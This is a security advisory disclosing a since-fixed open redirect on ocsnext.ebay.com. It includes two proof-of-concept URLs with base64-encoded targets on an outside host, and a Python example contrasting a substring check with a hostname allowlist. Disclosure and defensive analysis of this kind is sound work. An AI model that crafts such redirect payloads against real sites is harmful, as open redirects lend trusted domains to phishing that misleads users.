SSCHADV2014-005 - ocsnext.ebay.com - Open Redirect
Advisory: ocsnext.ebay.com – Open Redirect
Advisory ID: SSCHADV2014-005
Author: Stefan Schurtz
Affected Software: Successfully tested on ocsnext.ebay.com
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
The website "ocsnext.ebay.com" is prone to an open redirect via a specially crafted URL.
======================
PoC-Exploit
======================
// open redirect doesn't work
// http://www.darksecurity.de/ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0)
http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center
// open redirect works
// http://www.darksecurity.de/pages.ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0)
http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center
The open redirect works only when the string "pages.ebay.com" appears somewhere in the target URL: the target http://www.darksecurity.de/pages.ebay.com.txt passes the check even though its host is www.darksecurity.de, which indicates the endpoint matches the string anywhere in the URL rather than checking the hostname.
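The following Python example is added here to illustrate the validation difference the PoC exposes; it is not eBay's code and not part of the original advisory. It decodes a base64 ocsrelatedhelpurl value (the two values from the PoC above), then runs it through a substring check of the kind the PoC implies, and through a hostname allowlist check. The allowlist contents, the helper names, the URL http://pages.ebay.com/help and the fallback path "/" are assumptions made for the example.

```python
import base64
from urllib.parse import urlparse

# Hosts the redirect endpoint is allowed to send users to. This is an
# assumed allowlist for the example; the advisory only names pages.ebay.com.
ALLOWED_HOSTS = {"pages.ebay.com"}

# The two encoded targets from the advisory's PoC (page values).
POC_BLOCKED = "aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0"
POC_REDIRECTED = "aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0"


def decode_target(param: str) -> str:
    """Decode the base64 ocsrelatedhelpurl parameter into a URL string."""
    # Re-add '=' padding so values stripped of padding still decode.
    padded = param + "=" * (-len(param) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def encode_target(url: str) -> str:
    """Inverse of decode_target; used to build sample parameters."""
    return base64.b64encode(url.encode("utf-8")).decode("ascii")


def weak_check(target: str) -> bool:
    """Substring check of the kind the PoC behaviour implies.

    Any URL containing 'pages.ebay.com' anywhere passes, including
    http://www.darksecurity.de/pages.ebay.com.txt, whose host is not eBay's.
    """
    return "pages.ebay.com" in target


def strict_check(target: str) -> bool:
    """Hostname allowlist: parse the URL and compare the host exactly.

    Rejects scheme-relative URLs, non-http(s) schemes, userinfo tricks such
    as https://pages.ebay.com@other.example/ and look-alike subdomains.
    """
    parsed = urlparse(target)
    if parsed.scheme not in ("http", "https"):
        return False
    host = (parsed.hostname or "").lower()
    return host in ALLOWED_HOSTS


def redirect_target(param: str, fallback: str = "/") -> str:
    """Return the decoded target if it passes strict_check, else the fallback.

    This is the shape a hardened handler would take: never redirect to an
    unvalidated value, fall back to a local path instead.
    """
    try:
        target = decode_target(param)
    except (ValueError, UnicodeDecodeError):
        return fallback
    return target if strict_check(target) else fallback


def evaluate(param: str) -> dict:
    """Show both checks side by side for one encoded parameter."""
    target = decode_target(param)
    return {
        "target": target,
        "weak": weak_check(target),
        "strict": strict_check(target),
    }


if __name__ == "__main__":
    for name, param in (("blocked", POC_BLOCKED), ("redirected", POC_REDIRECTED)):
        print(name, evaluate(param))
    print("hardened handler ->", redirect_target(POC_REDIRECTED))
```

Running the block prints that the second PoC value passes the substring check but fails the hostname check, and that the hardened handler falls back to "/" for it. The design point is that the check must be made on the parsed hostname after the parameter is decoded, against an exact allowlist, not on the raw string.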
======================
Solution
======================
It seems that eBay fixed the problem without giving feedback.
======================
Disclosure Timeline
======================
30-Jan-2014 – ebay informed via "http://pages.ebay.com/securitycenter/Researchers.html"
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ebay.com/
http://www.darksecurity.de/advisories/2014/SSCHADV2014-005.txt